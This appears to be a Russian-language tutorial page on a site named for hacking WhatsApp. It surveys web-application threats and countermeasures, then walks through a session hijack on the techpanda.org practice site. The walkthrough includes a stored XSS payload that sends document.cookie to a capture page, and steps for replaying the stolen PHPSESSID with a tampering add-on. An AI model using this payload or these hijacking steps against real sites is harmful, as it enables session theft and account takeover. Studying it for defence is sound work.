Онлайн пример как взломать сайт - Взломать WhatsApp

Перейти к контенту

Главное меню:

Онлайн пример как взломать сайт

Телефон

Проникаем на чужие сайты на примере одного взлома.

Всё больше людей имеют доступ к интернету, чем когда-либо прежде. Это побудило многие организации разрабатывать сайты, которые пользователи могут использовать в интернете для взаимодействия с организацией. Плохо написанный код для веб-приложений может быть использован для получения несанкционированного доступа к конфиденциальным данным и веб-серверам.

В этой статье мы познакомим вас с методами взлома сайтов и мерами противодействия, которые вы можете применить для защиты от таких атак.






Веб-приложение - это приложение, основанное на клиент-серверной модели. Сервер обеспечивает доступ к базе данных и бизнес-логику. Он размещается на веб-сервере. Клиентское приложение выполняется в веб-браузере клиента. Сайты обычно пишутся на таких языках, как Java, C# и VB.Net, PHP, язык разметки ColdFusion и др. движки баз данных, используемые в сайтых, включают MySQL, MS SQL Server, PostgreSQL, SQLite и др.

Большинство веб-приложений размещаются на общедоступных серверах, доступных через Интернет. Это делает их уязвимыми для атак из-за легкого доступа. Ниже перечислены распространенные угрозы для ресурсов.

- Инъекция SQL – целью этой угрозы может быть обход алгоритмов входа в систему, измена данных и т. д.

- Атаки типа "отказ в обслуживании" – целью этой угрозы является отказ законным пользователям в доступе к ресурсу

- Межсайтовый сценарий XSS – цель этой угрозы внедрить код, который может быть выполнен в браузере на стороне клиента.

- Cookie (куки) / Сессия – целью этой угрозы является изменение данных cookie / session злоумышленником для получения несанкционированного доступа.

- Подделка форм – мишень этой угрозы является изменение данных форм, таких как цены в приложениях электронной коммерции, чтобы злоумышленник мог получить товары по сниженным ценам.

- Инъекция кода – задача этой угрозы состоит в том, чтобы ввести код, такой как PHP, Python и т. д. это может быть выполнено на сервере. Код может устанавливать бэкдоры, раскрывать конфиденциальную информацию и т.д.

- Defacement – хитрость хакера заключается в изменении страницы, отображаемой на веб-сайте, и перенаправлении всех запросов страниц на одну страницу, содержащую сообщение злоумышленника.


Организация может принять следующую тактику для защиты себя от атак веб-сервера.

Инъекция SQL – очистка и проверка пользовательских параметров, перед отправкой их в базу данных для обработки, может помочь снизить вероятность атаки с помощью инъекции SQL. Ядра СУБД, такие как MS SQL Server, MySQL и др. параметры поддержки и подготовленные заявления. Они намного безопаснее, чем традиционные операторы SQL.

Атаки типа "отказ в обслуживании" – брандмауэры могут использоваться для удаления трафика с подозрительного IP-адреса, если атака является простой DoS. Правильная конфигурация сетей и системы обнаружения вторжений также может помочь снизить вероятность успешной DoS-атаки.

Межсайтовые сценарии – проверка и очистка заголовков, параметров, передаваемых через URL, параметров формы и скрытых значений может помочь уменьшить XSS-атаки.

Отравление файлов cookie/сеансов – это можно предотвратить путем шифрования содержимого файлов cookie, тайм-аута файлов cookie через некоторое время, связывания файлов cookie с IP-адресом клиента, который был использован для их создания.

Темперирование форм – это можно предотвратить путем проверки пользовательского ввода перед его обработкой.

Внедрение кода – это можно локализовать, обрабатывая все параметры как данные, а не исполняемый код. Для этого можно использовать "дезинфекцию" кода и проверку подлинности.

Defacement – хорошая политика безопасности разработки веб-приложений должна гарантировать, что она блокирует обычно используемые уязвимости для доступа к веб-серверу. Это может быть правильная конфигурация операционной системы, программное обеспечение веб-сервера и рекомендации по обеспечению безопасности при разработке веб-приложений.


В этом практическом сценарии мы собираемся захватить сеанс пользователя сайта, расположенного по адресу www.techpanda.org . Мы будем использовать межсайтовые сценарии для чтения идентификатора сеанса cookie, а затем использовать его для олицетворения законного сеанса пользователя.

Предполагается, что злоумышленник имеет доступ к сайту, и он хотел бы захватить сеансы других пользователей, которые используют то же приложение. Целью этой атаки может быть получение доступа администратора к ресурсу, если учетная запись доступа злоумышленника ограничена.

Итак, приступим:

1. Открыть http://www.techpanda.org/

2. Для практических целей настоятельно рекомендуется получить доступ с помощью инъекции SQL. Смотрите эту статью для получения дополнительной информации о том, как это сделать.

3. Вход электронной почты является admin@google.com , пароль Password2010

4. Если вы успешно вошли в систему, то вы получите следующую панель мониторинга






1. Нажмите на кнопку - "Добавить новый контакт"

2. Введите следующее в качестве первого имени

<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\"></a>

В приведенном выше коде используется JavaScript . Он добавляет гиперссылку с событием onclick . Когда ничего не подозревающий пользователь нажимает на ссылку, событие извлекает идентификатор сеанса PHP cookie и отправляет его в snatch_sess_id.php страница вместе с идентификатором сессии в URL-адресе.






3. Введите остальные сведения, как показано ниже

4. Нажмите на кнопку - "Сохранить изменения"






Теперь ваша панель мониторинга будет выглядеть следующим образом







Поскольку код межсайтового скрипта хранится в базе данных, он будет загружаться каждый раз, когда пользователи с правами доступа входят в систему. Предположим, администратор входит в систему и нажимает на гиперссылку, которая говорит Dark. Он / она получит окно с идентификатором сеанса, отображаемым в URL-адресе.







Примечание: скрипт может отправлять значение на какой-то удаленный сервер, где хранится PHPSESSID, а затем пользователь перенаправляется обратно на веб-сайт, как будто ничего не произошло.

Примечание: полученное значение может отличаться от приведенного в этом руководстве, но концепция остается той же.



Воплощение сеанса с помощью Firefox и настройки для изменения данных.


На приведенной ниже блок-схеме показаны шаги, которые необходимо выполнить для выполнения этого упражнения.






Вам понадобится веб-браузер Firefox для этого раздела и надстройки для изменения данных. Откройте Firefox и установите приложение add, как показано на диаграммах ниже.










Выполните поиск данных несанкционированного доступа, а затем нажмите кнопку "Установить", как показано выше.






Нажмите на кнопку "Принять и установить…"












Нажмите кнопку "Перезагрузить сейчас", когда установка завершена.

Включите строку меню в Firefox, если она не отображается.






Нажмите на меню Сервис, а затем выберите Tamper Data, как показано ниже.







Вы получите следующее окно.

Примечание: Если окна не пусты, нажмите кнопку - "Очистить"






Нажмите на меню "Пуск Tamper"

Вернитесь в веб-браузер Firefox, введите http://www.techpanda.org/dashboard.php затем нажмите клавишу enter, чтобы загрузить страницу

Вы получите следующее всплывающее окно из данных Tamper








Всплывающее окно имеет три (3) опции. Опция Tamper позволяет изменять информацию заголовка HTTP перед ее отправкой на сервер .

Щелкнуть по нему

Вы получите следующее окно






Скопируйте идентификатор сеанса PHP, который вы скопировали из URL-адреса атаки, и вставьте его после знака равенства.

Ваша ценность теперь должна выглядеть так

PHPSESSID=2DVLTIPP2N8LDDBN11B2RA76LM2

Нажмите на кнопку OK

Вы снова получите всплывающее окно с данными о несанкционированном вскрытии








Снимите флажок, который просит - "Продолжить фальсификацию?"

Нажмите на кнопку Отправить, когда закончите.

Вы должны иметь возможность видеть панель мониторинга, как показано ниже.









Примечание: мы не входили в систему, мы олицетворяли сеанс входа, используя значение PHPSESSID, которое мы получили с помощью межсайтовых сценариев.

Краткие сведения

Веб-приложение основано на модели клиент-сервер. Клиентская сторона использует веб-браузер для доступа к ресурсам на сервере.

Сайты обычно доступны через интернет. Это делает их уязвимыми для нападений.

Угрозы сайтов включают инъекцию SQL, инъекцию кода, XSS, порчу, заражение файлов Cookie и т. д.

Хорошая политика безопасности при разработке веб-приложений может помочь сделать их безопасными.


Комментарии для сайта Cackle



0 comments | c o n n e c t   w i t c h



Назад к содержимому | Назад к главному меню